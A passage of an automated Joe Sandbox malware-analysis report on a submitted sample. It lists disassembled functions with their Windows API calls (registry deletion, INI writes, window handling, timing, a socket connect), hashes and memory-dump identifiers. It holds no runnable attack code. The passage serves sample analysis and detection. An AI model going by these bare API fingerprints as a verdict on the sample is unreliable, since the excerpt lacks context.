                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                            • String ID:
                                                            • API String ID: 3539004672-0
                                                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                            Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID:
                                                            • API String ID: 327565842-0
                                                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                            Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                            Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Enum$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 2095303065-0
                                                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                            Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00436A24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: RectWindow
                                                            • String ID:
                                                            • API String ID: 861336768-0
                                                            • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                            • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                            • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                            • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                            Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00449598
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                            • _wcslen.LIBCMT ref: 0044960D
                                                            • _wcslen.LIBCMT ref: 0044961A
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 1856069659-0
                                                            • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                            • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                            • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                            • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                            Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004478E2
                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                            • GetCursorPos.USER32(00000000), ref: 0044796A
                                                            • TrackPopupMenuEx.USER32(02E86500,00000000,00000000,?,?,00000000), ref: 00447991
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CursorMenuPopupTrack$Proc
                                                            • String ID:
                                                            • API String ID: 1300944170-0
                                                            • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                            • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                            • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                            • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                            Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004479CC
                                                            • GetCursorPos.USER32(?), ref: 004479D7
                                                            • ScreenToClient.USER32(?,?), ref: 004479F3
                                                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 1822080540-0
                                                            • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                            • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                            • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                            • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                            Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                            • String ID:
                                                            • API String ID: 659298297-0
                                                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                            Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(02E81A90,000000F1,00000000,00000000), ref: 00440E6E
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(02E81A90,000000F1,00000001,00000000), ref: 00440E9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableMessageSend$LongShow
                                                            • String ID:
                                                            • API String ID: 142311417-0
                                                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                            Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                            Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00445879
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                            • _wcslen.LIBCMT ref: 004458FB
                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 3087257052-0
                                                            • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                            • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                            Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                            • closesocket.WSOCK32(00000000), ref: 00465481
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 245547762-0
                                                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                            Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 004471D8
                                                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                            • SelectObject.GDI32(?,00000000), ref: 00447228
                                                            • BeginPath.GDI32(?), ref: 0044723D
                                                            • SelectObject.GDI32(?,00000000), ref: 00447266
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                            • String ID:
                                                            • API String ID: 2338827641-0
                                                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                            Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00434598
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                            • Sleep.KERNEL32(00000000), ref: 004345D4
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
